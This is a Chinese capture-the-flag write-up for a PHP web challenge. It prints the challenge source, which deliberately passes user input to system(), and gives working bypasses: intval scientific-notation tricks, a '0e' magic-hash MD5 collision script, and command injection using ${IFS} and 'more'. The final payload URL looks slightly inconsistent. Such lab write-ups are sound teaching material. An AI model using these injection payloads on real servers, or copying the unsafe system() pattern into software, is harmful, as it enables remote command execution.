1、在title看到bot,訪問robots.txt
2、
User-agent: *
Disallow: /fAke_f1agggg.php
繼續訪問/fAke_f1agggg.php
3、在響應頭發現/fl4g.php:
得到源碼:
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不經意間看了看我的勞力士, 不是想看時間, 只是想不經意間, 讓你知道我過得比你好.</br>";
}else{
die("金錢解決不了窮人的本質問題");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到這個CTFer拿到flag后, 感激涕零, 跑去東瀾岸, 找一家餐廳, 把廚師轟出去, 自己炒兩個拿手小菜, 倒一杯散裝白酒, 致富有道, 別學小暴.</br>";
else
die("我趕緊喊來我的酒肉朋友, 他打了個電話, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到這里, 我充實而欣慰, 有錢人的快樂往往就是這么的朴實無華, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
第一層:
if(intval($num) < 2020 && intval($num + 1) > 2021)
發現intval()函數在處理字符串型的科學計數法時,只輸出e前面的數字
馬上測試:
<?php
echo intval(1e10);
echo "\r\n";
echo intval("1e10");
echo "\r\n";
echo intval("1e10"+1);
?>
運行結果:
10000000000
1
10000000001
發現$a+1,如果$a是字符串型的科學計數法,$a+1后,$a會強制轉換為數字
所以,url:/fl4g.php?num=1e10
第二層:
if ($md5==md5($md5))
要求字符串md5后還與原字符串弱相等
寫腳本跑一下:
import hashlib
for i in range(0,10**41):
i='0e'+str(i)
md5=hashlib.md5(i.encode()).hexdigest()
if md5[:2]=='0e' and md5[2:].isdigit():
print('md5:{} '.format(i))
break
十幾分鍾后跑出:
md5:0e215962017
url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017
第三層:
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到這里, 我充實而欣慰, 有錢人的快樂往往就是這么的朴實無華, 且枯燥.</br>";
system($get_flag);
$get_flag不能有空格,不能有cat字符串
空格繞過,參考:https://www.freebuf.com/articles/web/137923.html
cat用more繞過
url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017&get_flag=more${IFS}ls